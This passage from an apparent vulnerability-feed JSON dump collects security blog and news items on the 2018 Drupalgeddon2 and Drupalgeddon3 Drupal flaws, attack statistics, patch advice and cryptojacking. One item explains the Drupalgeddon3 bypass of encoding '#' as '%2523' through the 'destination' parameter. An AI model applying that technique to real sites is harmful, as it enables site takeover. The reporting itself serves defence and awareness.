then use it to attack. Before that, we saw almost no traffic whatsoever!\n\n## Attack Data\n\nThe chart below is just the beginning of the numbers we\u2019re now seeing in our cloud, and they are continuing to rise (Figure 1).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-date.png>)\n\n_Figure 1: Attacks by date_\n\nTo this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets (Figure 2).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-distribution-type.png>)\n\n_Figure 2: Attacks by distribution type_\n\nAlso, most of the attacks originated from the US (53%) and China (45%) (Figure 3).\n\n[](<https://www.imperva.com/blog/wp-content/uploads/2018/04/drupalgeddon-2-attacks-by-geo.png>)\n\n_Figure 3: Location source of attacks_\n\n## Imperva Customers Protected\n\nWe applied a virtual patch to Imperva SecureSphere and Incapsula WAF customers within hours of identifying the RCE vulnerability.\n\nIn addition to our zero-day protection rules that spotted this attack, we also published a new dedicated security rule to provide maximum protection to Imperva SecureSphere and Incapsula WAF customers against this vulnerability.", "modified": "2018-04-13T19:13:25", "published": "2018-04-13T19:13:25", "id": "IMPERVABLOG:4416FB86A8069C419B8EAC9DBF52A644", "href": "https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/", "type": "impervablog", "title": "Drupalgeddon 2.0: Are Hackers Slacking Off?", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-27T14:50:26", "bulletinFamily": "blog", "description": "\n\n_(**Jan. 12 update: ** Due to a data transfer error, some of the 2017 figures were incorrectly reported; this version of the blog has been corrected. This error did not affect our 2018 statistics, nor our conclusions.)_\n\nAs a web application firewall provider, part of our job at Imperva is to continually monitor for new security vulnerabilities. To do this, we use internal software that collects information from various data sources such as vulnerability databases, newsletters, forums, social media and more, integrates it into a single repository, and assesses each vulnerability\u2019s priority. Having this kind of data puts us in a unique position to provide an analysis of all web application vulnerabilities throughout the year, view trends, and notice significant changes in the security landscape. As we did _[last year](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we took a look back at 2018 to understand the changes and trends in web application security over the past year.\n\nThe bad news is that in 2018, like _[2017](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2017/>)_, we continued to see a **trend of increasing number of web application vulnerabilities**, particularly vulnerabilities related to _[injection](<https://www.owasp.org/index.php/Top_10-2017_A1-Injection>)_ such as _[SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>)_, command injection, object injection, etc. On the content management system (CMS) front, **WordPress vulnerabilities continue to grow, **and they continue to dominate in terms of the number of vulnerabilities published in the CMS category. Although WordPress leads the pack in sheer vulnerabilities numbers, **Drupal ****vulnerabilities had a larger effect and were used in mass attacks **that targeted hundreds of thousands of sites during 2018. However, there is some good news for the security industry \u2014 the number of **Internet of Things (IoT) vulnerabilities declined**, as well as the number of vulnerabilities related to weak authentication. In the server side technologies category, the **number of PHP vulnerabilities continued to decline**. In addition, the **growth in API vulnerabilities also slightly declined**.\n\n## 2018 Web Application Vulnerabilities Statistics\n\nThe first phase in our yearly analysis was to check the amount of vulnerabilities published in 2018 in comparison to previous years. Figure 1 shows the number of vulnerabilities on a monthly basis over the last three years. We can see that the overall number of new vulnerabilities in 2018 (17,308) increased by 23% compared to 2017 (14,082) and by 162% compared to 2016 (6,615). According to our data, more than half of web application vulnerabilities (54%) have a public exploit available to hackers. In addition, more than a third (38%) of web application vulnerabilities don\u2019t have an available solution, such as a software upgrade workaround or software patch.\n\n \n\n \n_Figure 1: Number of web application vulnerabilities in 2016-2018_\n\n## Vulnerabilities by Category\n\nIn Figure 2, you can find 2018 vulnerabilities split into _[OWASP TOP 10 2017](<https://www.imperva.com/app-security/owasp-top-10/>)_ categories.\n\n## Most Common Vulnerability: Injections\n\nThe dominant category this year was by far **injections**, with 19% (3,294) out of the total vulnerabilities of 2018, which is also a 267% increase from last year. When talking about injection vulnerabilities, the first thing that jumps to mind is SQL injections. When drilling down the data, however, we saw remote command execution (RCE) emerge as the bigger issue, with 1,980 vulnerabilities (11.5%), compared to 1,354 vulnerabilities (8%) for SQLi.\n\n_Figure 2: Vulnerabilities into categories 2014-2018_\n\n## No. 2 Vulnerability \u2014 Cross-Site Scripting\n\nThe number of Cross-site scripting (XSS) vulnerabilities continued to grow and appears to be the second most common vulnerability (14%) among 2018 web application vulnerabilities.\n\n## IoT Vulnerabilities Decreased\n\nIt appears that the number of IoT vulnerabilities has decreased tremendously. Despite the common belief that all our electronic devices can be easily compromised, it appears that something has changed in this area. Possible explanations include: IoT vendors have finally started to implement better security in IoT devices, or that hackers and researchers found another area to focus on in 2018.\n\n \n_Figure 3: IoT vulnerabilities 2014-2018_\n\n## API Vulnerabilities: Growing, but Slowing\n\nAPI (Application Programming Interface) vulnerabilities are becoming more widespread as time goes by. Figure 4 shows the number of API vulnerabilities between 2015-2018. New API vulnerabilities in 2018 (264) increased by 23% over 2017 (214), by 56% compared to 2016 (169), and by 154% compared to 2015 (104).\n\n \n_Figure 4: API vulnerabilities 2015-2018_\n\nAlthough API vulnerabilities continue to grow year-over-year, it appears to be slowing, from 63% between 2015-16 to 27% in 2016-2017 and now 23% between 2017-18. One possible explanation is that since APIs are more popular nowadays, they draw more attention from hackers and security researchers. In turn, organizations spend more time securing their APIs.\n\n## Vulnerabilities in Content Management Systems: Attackers Focused on WordPress\n\nThe most popular content management system is _[WordPress](<https://en.wikipedia.org/wiki/WordPress>)_, used by over 28% of all websites, and by 59% of all websites using a known content management system, according to market share statistics cited by Wikipedia, followed by _[Joomla](<https://en.wikipedia.org/wiki/Joomla>) _and _[Drupal](<https://en.wikipedia.org/wiki/Drupal>)_. Perhaps unsurprisingly, WordPress also registered the highest number of vulnerabilities (542) last year, which is a 30% increase from 2017 (Figure 5).\n\n \n_Figure 5: Number of vulnerabilities by CMS platform 2016-2018_\n\nAccording to the _[WordPress ](<https://wordpress.org/plugins/>)_official site, the current number of plugins is 55,271. This means that only 1,914 (3%) were added in 2018.\n\n \n_Figure 6: Number of WordPress plugins_\n\nDespite the slowed growth in new plugins, **the number of WordPress vulnerabilities increased.** The explanation for this could either be the code quality of the plugins, or the fact that WordPress is such a popular CMS, which motivate more attackers to develop dedicated attack tools and try their luck searching for holes in the code.\n\nUnsurprisingly, 98% of WordPress vulnerabilities are related to _[plugins](<https://en.wikipedia.org/wiki/WordPress>)_[ ](<https://en.wikipedia.org/wiki/WordPress>)(see Figure 7 below), which extend the functionality and features of a website or a blog. Anyone can create a plugin and publish it \u2014 WordPress is open source, easy to manage, and there is no enforcement or any proper process that mandates minimum security standards (e.g. code analysis). Hence, WordPress plugins are prone to vulnerabilities.\n\n \n_Figure 7: WordPress third party vendor vulnerabilities in 2018_\n\nIn Figure 8 below, you can find the ten WordPress plugins with the most vulnerabilities discovered in 2018. Note that these are not necessarily the most-attacked plugins as the report refers to the amount of vulnerabilities seen throughout the year \u2013 and is based upon the continual aggregation of vulnerabilities from different sources. Our annual report is solely based on statistics from this system, and we listed all vulnerabilities that were published during 2018 in general, in WordPress and WordPress plugins._ _This indicator solely looks at the most vulnerabilities. There are other measures that are not included in the report - such as \u2018top attacked\u2019 or \u2018riskiest\u2019 - which do not necessarily correlate with this measurement.\n\n \n\n\n \n_Figure 8: Top 10 vulnerable WordPress plugins in 2018_\n\n## Server Technologies: PHP Vulnerabilities Fell\n\nSince the most popular server-side programming language for websites continues to be PHP, we expect it to have more vulnerabilities than equivalent languages. And that was true. However, as Figure 9 below shows, new vulnerabilities in PHP fell in 2018 versus 2017, just as they did in the prior year. The lack of PHP updates - only one minor update was released, PHP 7.3, in December - could explain why.\n\n \n_Figure 9: Top server-side technology vulnerabilities 2014-2018_\n\n## The Year of Drupal\n\nAlthough Drupal _[is the third-most](<https://w3techs.com/technologies/overview/content_management/all>) _popular CMS, two of its vulnerabilities, _[CVE-2018-7600](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>) _('23-mar' bar in Figure 10 below), and _[CVE-2018-7602 ](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_('25-apr' bar below, also known as _[Drupalgeddon2 ](<https://www.imperva.com/blog/drupalgeddon-2-0-are-hackers-slacking-off/>)_and _[Drupalgeddon3](<https://www.imperva.com/blog/just-third-critical-drupal-flaw-discovered/>)_), were the root cause of many security breaches in hundreds of thousands of web servers in 2018. These vulnerabilities allowed an unauthenticated attacker to remotely inject malicious code and run it on default or common Drupal installations. These vulnerabilities allow attackers to connect to backend databases, scan and infect internal networks, mine cryptocurrencies, infect clients with trojans, and more.\n\nThe simplicity of these Drupal vulnerabilities and their catastrophic impact made them a weapon of choice for many attackers. In fact, Imperva detected and blocked more than half a million attacks related to these vulnerabilities during 2018. These attacks were also the basis for a few interesting _[blogs ](<https://www.incapsula.com/blog/crypto-me0wing-attacks-kitty-cashes-in-on-monero.html>)_we wrote this year. There was another risky vulnerability, part of the Drupal security patch _[sa-core-2018-006](<https://www.drupal.org/sa-core-2018-006>)_, that published in October. However, since it was not easy to exploit, the number of attacks was small.\n\n \n\n_Figure 10: CVSS Score of Drupal vulnerabilities in 2018_\n\n## Predictions for 2019\n\nAs a security vendor, we\u2019re often asked about our predictions. Here are our vulnerability predictions for 2019:\n\n * PHP announced that versions 5.5, 5.6 and 7.0 reached their _[end of life](<https://secure.php.net/supported-versions.php>)_. That means that these versions will no longer receive security updates. Major CMS like WordPress, Drupal, and Joomla are developed in PHP and require newer versions of PHP. However, they still support older versions. The result is that hackers are now motivated to find new security vulnerabilities in unsupported PHP versions since they will not be fixed and impact every application built with these outdated versions. For example, according to _[Shodan](<https://www.shodan.io/search?query=php%2F5>)_ there are currently 34K servers with these unsupported PHP versions\n * Injection vulnerabilities will continue to grow mainly because of the economic implications to attackers (make fast money)\n * More vulnerabilities in APIs will be discovered as DevOps become a crucial factor in IT and their usage and demand for APIs is growing\n\n## How to Protect Your Apps and Data\n\nOne of the best solutions for protecting against web application vulnerabilities is to deploy a web application firewall (WAF). A WAF may be either on-premises, in the cloud or _[a combination of both](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)_ depending on your needs, infrastructure, and more. As organizations are moving more of their apps and data to the cloud, it\u2019s important to think through your security _[requirements](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>)_. A solution supported by a dedicated security team is one to add to your selection criteria. Security teams can push timely security updates to a WAF in order to properly defend your assets.\n\n \n\n \n\nThe post [The State of Web Application Vulnerabilities in 2018](<https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "modified": "2019-01-09T14:00:26", "published": "2019-01-09T14:00:26", "id": "IMPERVABLOG:B21E6C61B26ED07C8D647C57348C4F9E", "href": "https://www.imperva.com/blog/the-state-of-web-application-vulnerabilities-in-2018/", "type": "impervablog", "title": "The State of Web Application Vulnerabilities in 2018", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "thn": [{"lastseen": "2018-04-14T12:08:49", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-5T7PpU6AWTk/WtG6Fi7QwCI/AAAAAAAAwOw/y5fEvJ9j7kM_-JbVZmCYg_FMATnvpYzmACLcBGAs/s1600-e20/hacking-drupal-remote-code-execution-exploit-code.png>)\n\nHackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of working exploit code. \n \nTwo weeks ago, Drupal security team [discovered](<https://www.drupal.org/sa-core-2018-002>) a highly critical remote code execution vulnerability, dubbed **Drupalgeddon2**, in its content management system software that could allow attackers to completely take over vulnerable websites. \n \nTo address this vulnerability the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue. \n \nTwo days ago, security researchers at Check Point and Dofinity [published](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) complete technical details about this vulnerability (CVE-2018-7600), using which, a Russian security researcher published a proof-of-concept (PoC) [exploit code](<https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py>) for Drupalgeddon2 on GitHub. \n \nThe Drupalgeddon2 vulnerability that affects all versions of Drupal from 6 to 8 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations. \n\n\n[](<https://1.bp.blogspot.com/-qsxcL4GQ5_Y/WtG9rLLIcyI/AAAAAAAAwO8/acsBgkJ4gYYe5c5Vnk2t2l3f-S95bTrBgCLcBGAs/s1600-e20/drupal-exploit.png>)\n\n \nAccording to checkpoint's disclosure, the vulnerability exists due to the insufficient sanitation of inputs passed via Form API (FAPI) AJAX requests. \n \n\n\n> \"As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,\" Check Point researchers said. \n\n> \"By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.\"\n\n \nHowever, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at [Sucuri](<https://twitter.com/danielcid/status/984555586644688898>), [Imperva](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>), and the [SANS](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none have yet to see any reports of websites being hacked. \n \nSites administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible to avoid exploits. \n \nThe vulnerability also affects Drupal 6, which is no longer supported by the company since February 2016, but a patch for the version has still been created.\n", "modified": "2018-04-14T08:37:13", "published": "2018-04-13T21:29:00", "id": "THN:B0F0C0035DAAFA1EC62F15464A80677E", "href": "https://thehackernews.com/2018/04/drupal-rce-exploit-code.html", "type": "thn", "title": "Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-06-05T08:54:10", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings. \n\n\n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://1.bp.blogspot.com/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was published online, which was followed by large-scale Internet scanning and exploitation attempts. \n\n\n \nShortly after that, we saw attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon 2 vulnerability to inject [cryptocurrency miner](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>)s, backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nMursch scanned the Internet and found nearly 500,000 websites were running on Drupal 7, out of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of Belgium police department, Colorado Attorney General office, Fiat subsidiary Magneti Marelli and food truck locating service\u2014have already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already upgraded their sites to the latest Drupal version, but the cryptojacking malware still existed. \n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "modified": "2018-06-05T08:06:24", "published": "2018-06-05T08:06:00", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-26T16:08:56", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-UXNjejbbqro/WuHDxyHAooI/AAAAAAAAwdM/yTGfiL9DknsnLaj9Z4dNy7xHoeZPrXinwCLcBGAs/s1600-e20/drupal-hacking.png>)\n\nOnly a few hours after the Drupal team releases latest updates to fix a new remote code execution flaw in its content management system software, hackers have already started exploiting the vulnerability in the wild. \n \nAnnounced yesterday, the newly discovered vulnerability ([CVE-2018-7602](<https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html>)) affects Drupal 7 and 8 core and allows remote attackers to achieve exactly same what previously discovered [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) flaw allowed\u2014complete take over of affected websites. \n \nAlthough Drupal team has not released any technical details of the vulnerability to prevent immediate exploitation, two individual hackers have revealed some details, along with a [proof-of-concept exploit](<https://pastebin.com/pRM8nmwj>) just a few hours after the patch release. \n \nIf you have been actively reading every latest story on The Hacker News, you must be aware of how the release of [Drupalgeddon2 PoC exploit](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) derived much attention, which eventually allowed attackers actively hijack websites and [spread cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware. \n \nAs expected, the Drupal team has warned that the new remote code execution flaw, let's refer it **Drupalgeddon3**, is now actively being exploited in the wild, again leaving millions of websites vulnerable to hackers. \n \nIn this article, I have briefed what this new flaw is all about and how attackers have been exploiting it to hack websites running unpatched versions of Drupal. \n\n\n[](<https://1.bp.blogspot.com/-aGyyaDhvYXI/WuHEwO_-DLI/AAAAAAAAwdU/brSU19-lJUkoC7LU-0YR1vh10h9gVLrLQCLcBGAs/s1600-e20/drupal-exploit-code.png>)\n\n \nThe exploitation process of Drupalgeddon3 flaw is somewhat similar to Drupalgeddon2, except it requires a slightly different payload to trick vulnerable websites into executing the malicious payload on the victim's server. \n \nDrupalgeddon3 resides due to the improper input validation in Form API, also known as \"renderable arrays,\" which renders metadata to output the structure of most of the UI (user interface) elements in Drupal. These renderable arrays are a key-value structure in which the property keys start with a hash sign (#). \n \nA Twitter user with handle [@_dreadlocked](<https://twitter.com/_dreadlocked/status/989206562945273859>) explains that the flaw in Form API can be triggered through the \"destination\" GET parameter of a URL that loads when a registered user initiates a request to delete a node; where, a \"node\" is any piece of individual content, such as a page, article, forum topic, or a post. \n \nSince this \"destination\" GET query parameter also accepts another URL (as a value) with its own GET parameters, whose values were not sanitized, it allowed an authenticated attacker to trick websites into executing the code. \n \nWhat I have understood from the PoC exploit released by another Twitter user, using handle [@Blaklis_](<https://twitter.com/Blaklis_/status/989229547030794241?s=08>), is that the unsanitized values pass though stripDangerousValues() function that filters \"#\" character and can be abused by encoding the \"#\" character in the form of \"%2523\". \n \nThe function decodes \"%2523\" into \"%23,\" which is the Unicode version for \"#\" and will be processed to run arbitrary code on the system, such as a whoami utility. \n \nAt first, Drupal developers were skeptical about the possibility of real attacks using the Drupalgeddon3 vulnerability, but after the reports of in-the-wild attacks emerged, Drupal raised the level of danger of the problem to \"Highly critical.\" \n \nTherefore, all Drupal website administrators are highly recommended to update their websites to the latest versions of the software as soon as possible.\n", "modified": "2018-04-26T12:32:45", "published": "2018-04-26T01:32:00", "id": "THN:F8EDB5227B5DA0E4B49064C2972A193D", "href": "https://thehackernews.com/2018/04/drupalgeddon3-exploit-code.html", "type": "thn", "title": "Release of PoC Exploit for New Drupal Flaw Once Again Puts Sites Under Attack", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-18T13:41:28", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-zMSVUp45Ep4/WtcTP9bdJsI/AAAAAAAAwTg/e-HDb99w0307p9aEkp1TPTePjTvSe7JRQCLcBGAs/s1600-e20/drupalgeddon-exploit.png>)\n\nThe Drupal vulnerability (CVE-2018-7600), dubbed [Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) that could allow attackers to completely take over vulnerable websites has now been exploited in the wild to deliver malware backdoors and cryptocurrency miners. \n \nDrupalgeddon2, a highly critical remote code execution vulnerability discovered two weeks ago in Drupal content management system software, was recently patched by the company without releasing its technical details. \n \nHowever, just a day after security researchers at Check Point and Dofinity published complete details, a Drupalgeddon2 proof-of-concept (PoC) [exploit code](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was made widely available, and large-scale Internet scanning and exploitation attempts followed. \n \nAt the time, no incident of targets being hacked was reported, but over the weekend, several security firms noticed that attackers have now started exploiting the vulnerability to install cryptocurrency miner and other malware on vulnerable websites. \n \nThe SANS Internet Storm Center [spotted](<https://isc.sans.edu/forums/diary/A+Review+of+Recent+Drupal+Attacks+CVE20187600/23563/>) some attacks to deliver a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl. \n\n\n[](<https://1.bp.blogspot.com/-cgGXAVXKeKc/WtcOhdYr0iI/AAAAAAAAwTQ/gXhXTplYR4oUU-jDAmOdEpSV_ZIIDPweACLcBGAs/s1600-e20/drupal-website-hacking.png>)\n\nThe simple PHP backdoor allows attackers to upload additional files (backdoors) to the targeted server. \n \nA thread on SANS ISC Infosec forums also [suggests](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) that Drupalgeddon2 is being used to install the XMRig Monero miner on vulnerable websites. Besides the actual XMRig miner, the malicious script also downloads additional files, including a script to kill competing miners on the targeted system. \n \nResearchers from security firm Volexity have also [observed](<https://www.volexity.com/blog/2018/04/16/drupalgeddon-2-profiting-from-mass-exploitation/>) a wide variety of actions and payloads attempted via the public exploit for Drupalgeddon2 to deliver malicious scripts that install backdoors and cryptocurrency miners on the vulnerable sites. \n \nThe researchers believed that one of the Monero miner campaigns, delivering XMRig, is associated with a criminal group that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miner malware shortly after its PoC exploit code was made public in late 2017. \n\n\n[](<https://1.bp.blogspot.com/-cWUncg7VBfo/WtcN9yL7mTI/AAAAAAAAwTI/--A-g7ptWeIueY8TO5tvLWL1aijI9OAjgCLcBGAs/s1600-e20/drupal-hacking.png>)\n\nVolexity identified some of the group's wallets that had stored a total of 544.74 XMR (Monero coin), which is equivalent to almost $105,567. \n \nAs we reported in our previous article, Imperva stats [showed](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>) that 90% of the Drupalgeddon2 attacks are simply IP scanning in an attempt to find vulnerable systems, 3% are backdoor infection attempts, and 2% are attempting to run crypto miners on the targets. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations under the privileges of the user, affecting all versions of Drupal from 6 to 8. \n \nTherefore, site admins were highly recommended to patch the issue by updating their CMS to Drupal 7.58 or Drupal 8.5.1 as soon as possible. \n\n\n> In its advisory, Drupal [warned](<https://www.drupal.org/psa-2018-002>) that \"sites not patched by Wednesday, 2018-04-11 may be compromised\" and \"simply updating Drupal will not remove backdoors or fix compromised sites.\"\n\nMoreover, \n\n\n> \"If you find that your site is already patched, but you didn\u2019t do it, that can be a symptom that the site was compromised. Some attacks in the past have applied the patch as a way to guarantee that only that attacker is in control of the site.\"\n\nHere's a guide Drupal team suggest to follow [if your website has been hacked](<https://www.drupal.org/node/2365547>).\n", "modified": "2018-04-18T09:50:03", "published": "2018-04-17T22:49:00", "id": "THN:F03064A70C65D9BD62A8F5898BA276D2", "href": "https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html", "type": "thn", "title": "Hackers Exploiting Drupal Vulnerability to Inject Cryptocurrency Miners", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-04-26T14:07:58", "bulletinFamily": "info", "description": "[](<https://1.bp.blogspot.com/-nI78JCGBjaE/WuCp9Z3ptKI/AAAAAAAAwcQ/XnP5D9Is0Z4NbW1Yo0LuebQ2_RxM9oa9QCLcBGAs/s1600-e20/drupal-patch-update.png>)\n\nDamn! You have to update your Drupal websites. \n \nYes, of course once again\u2014literally it\u2019s the third time in last 30 days. \n \nAs [notified](<https://www.drupal.org/psa-2018-003>) in advance two days back, Drupal has now released new versions of its software to patch yet another critical remote code execution (RCE) vulnerability, affecting its Drupal 7 and 8 core. \n \nDrupal is a popular open-source content management system software that powers millions of websites, and unfortunately, the CMS has been under active attacks since after the disclosure of a highly critical remote code execution vulnerability. \n \nThe new vulnerability was discovered while exploring the previously disclosed RCE vulnerability, dubbed **[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>)** (CVE-2018-7600) that was patched on March 28, forcing the Drupal team to release this follow-up patch update. \n \nAccording to a new [advisory](<https://www.drupal.org/sa-core-2018-004>) released by the team, the new remote code execution vulnerability (CVE-2018-7602) could also allow attackers to take over vulnerable websites completely. \n \n\n\n### How to Patch Drupal Vulnerability\n\n[](<https://1.bp.blogspot.com/-zI_GNj80adw/WuC42gTf-5I/AAAAAAAAwcg/BiiIUAQK33MSqQwCkvfkyFi1l0BAq_wpACLcBGAs/s1600-e20/drupal.png>)\n\n \nSince the previously disclosed flaw derived much attention and motivated attackers to target websites running over Drupal, the company has urged all website administrators to install new security patches as soon as possible. \n\n\n * If you are running 7.x, upgrade to Drupal 7.59.\n * If you are running 8.5.x, upgrade to Drupal 8.5.3.\n * If you are running 8.4.x, which is no longer supported, you need first to update your site to 8.4.8 release and then install the latest 8.5.3 release as soon as possible.\nIt should also be noted that the new patches will only work if your site has already applied patches for Drupalgeddon2 flaw. \n\n\n> \"We are not aware of any active exploits in the wild for the new vulnerability,\" a drupal spokesperson told The Hacker News. \"Moreover, the new flaw is more complex to string together into an exploit.\"\n\nTechnical details of the flaw, can be named **Drupalgeddon3**, have not been released in the advisory, but that does not mean you can wait until next morning to update your website, believing it won't be attacked. \n \nWe have seen how attackers developed [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging Drupalgeddon2 vulnerability to [inject cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites, within few hours after it's detailed went public. \n \nBesides these two flaws, the team also patched a moderately critical [cross-site scripting (XSS) vulnerability](<https://thehackernews.com/2018/04/drupal-site-vulnerability.html>) last week, which could have allowed remote attackers to pull off advanced attacks including cookie theft, keylogging, phishing and identity theft. \n \nTherefore, Drupal website admins are highly recommended to update their websites as soon as possible.\n", "modified": "2018-04-26T11:04:51", "published": "2018-04-25T05:41:00", "id": "THN:8E5D44939B2B2FF0156F7FF2D4802857", "href": "https://thehackernews.com/2018/04/drupal-vulnerability-exploit.html", "type": "thn", "title": "Third Critical Drupal Flaw Discovered\u2014Patch Your Sites Immediately", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "bulletinFamily": "blog", "description": "[](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>)Qualys Malware Research Labs is announcing the release of [Qualys BrowserCheck CoinBlocker](<https://chrome.google.com/webstore/detail/qualys-browsercheck-coinb/jdocohkgkgpminecekdnkoljcffebkgc>) Chrome extension to detect and block browser-based cryptocurrency mining, aka _cryptojacking_.\n\n### Cryptojacking\n\nCryptojacking attacks leverage the victim system\u2019s resources via malicious JavaScript to mine certain cryptocurrencies. Attackers carry out these attacks by infecting popular sites with JavaScript that enables cryptojacking. Any visitor to such sites will download the JavaScript and unknowingly contribute its system resources to mine a cryptocurrency that is added to the attacker\u2019s wallet. The resource-intensive mining process is carried out on victim systems typically consumes more than 70% of CPU, that reduces system performance, increases power consumption and can cause possible permanent damage to the system.\n\nBecause cryptojacking helps attackers earn cryptocurrency without spending a dime on mining infrastructure, it is very profitable. The overall cryptocurrency market capitalization has reached more than $270 billion as of July 2018 with more than 1700 active projects! There is a lot of money to be made for attackers leveraging these projects, and cryptomining is gradually moving to the center stage of threat landscape as an even more attractive option compared to the recent favorite ransomware campaigns.\n\nCryptojacking has also gone 